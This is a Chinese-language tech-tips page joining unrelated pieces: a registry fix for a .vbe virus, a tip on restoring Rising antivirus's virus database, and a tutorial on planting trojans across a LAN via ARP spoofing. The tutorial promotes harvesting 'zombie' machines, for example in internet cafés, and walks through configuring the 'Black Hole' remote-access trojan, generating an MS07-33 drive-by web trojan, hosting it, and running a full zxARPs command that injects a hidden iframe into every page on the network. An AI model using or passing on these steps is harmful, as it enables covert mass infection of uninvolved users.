可是在启动项中根本就没有发现相关的内容,于是很多中毒者只好忍受这个病毒的“折磨”,对它无可奈何。笔者起初也是如此,后来实在受不了那个DOS窗口,经过一番摸索,找到了解决的办法,现跟大家分享,希望对遇到这个病毒的读者有所帮助。
首先按“开始→运行”,输入“regedit”,然后在注册表中定位到HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows,删除Load中加载的东西,然后又定位到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,其中有“explorer REGSZ '.vbe” 这一项,这里的'.vbe 就是问题的根源。删除该注册表项,然后重启电脑,那个恼人的DOS窗口就没有了。
如何快速更新病毒库 我们自己通过制作程序制作的安装包,只能让我们恢复到在制作当时的病毒库。这就需要我们经常做,太麻烦了!而下载安装瑞星制作的安装包,则能让瑞星恢复到重装系统前的最新病毒库。但有一点就是我们在初次安装瑞星时,不要安装在系统盘上,否则重装后就什么都没有了!
假设我们的杀毒软件是装在D盘的,那么在重装后打开D盘,在目录D:\Program Files\Rising\Rav\Update下找到Setup.exe安装程序,然后双击运行,就会出现安装界面了。然后选择相同的路径进行覆盖安装就可以了。由于安装时所使用的是升级后的病毒库,所以安装后的瑞星,就已经是最新的版本了,免除了漫长的跨版本升级过程。
其他杀毒软件的更新操作类似。 呵呵,是不是快多了?
如何在局域网挂arp木马
网页挂马最难的就是传播了,小网站易入侵但是访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获的肉鸡就会成几何倍数增长。
局域网ARP欺骗挂马的好处如下:无需入侵网站,只要你的主机处于局域网中即可,这是它最大的优点;收获的肉鸡多多,短时间内可以收获数十台甚至上百台肉鸡,类似网吧这样由上百台电脑组成的局域网是最好的挂马场所;局域网内的用户访问任何网站都会中木马。看了上面的介绍,各位是不是已经蠢蠢欲动了?
第一步:配置木马服务端
我们以《黑洞》木马为例。运行《黑洞》木马的Client.exe文件,进入Client.exe的主界面后,点击“文件→创建DLL插入版本服务端程序”。
进入服务端程序的创建界面后,首先勾选“Win NT/2000/XP/2003下隐藏服务端文件、注册表、进程和服务”,然后切换到“连接选项”标签,在“主机”一栏中填入本机的公网IP地址,端口可以保持默认的“2007”。最后在“连接密码”处填入用来连接对方的密码,例如123456。设置完成后点击“生成”按钮,将木马服务端保存为muma.exe。
第二步:生成网页木马
既然是挂马,那当然缺不了网页木马了。这里我们用“MS07-33网马生成器”为例。运行“MS07-33网马生成器”,在“网马地址”文本框中输入木马所在路径,由于等会我们要自行架设HTTP服务,所以这里应该填入“http://192.168.0.2/muma.exe“,其中192.168.0.2是本机在局域网中的IP地址。点击“生成网马”按钮即可生成网马hackll.htm。
第三步:开启本机HTTP服务
要让局域网中的其他主机能够访问到我们的网马,就要开启本机的Http服务。下载Baby Web Server,这是一款简单的Web服务器软件,下载后直接运行,在其主界面中点击“服务→设置”。
将“网页目录”设置为网页木马所在的地方,例如C盘根目录“C:\“。点“确定”回主界面,然后再点“Start”按钮开启本机的Http服务。记住要将木马服务端和网页木马放到C盘根目录。
第四步:局域网挂马
最后该请我们的主角出场了,就是上文中提到的小工具,这个工具叫zxARPs,是一个通过ARP欺骗实现局域网挂马的工具。在使用zxARPs前我们要安装WinPcap,它是网络底层驱动包,没有它zxARPs就运行不了。
安装好后将zxARPs放到任意目录,然后运行“命令提示符”,进入zxARPs所在的目录,然后输入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert “<iframe src=‘http://192.168.0.2/hackll.htm’ width=0 height=0>”。回车后挂马就成功了。
从现在开始,局域网中的用户无论访问什么网站,都会运行我们的网页木马,因为zxARPs在用户打开网页的同时已经将挂马代码插入到正常网页中了。
From:http://www.itcomputer.com.cn/Article/Network/201309/382.html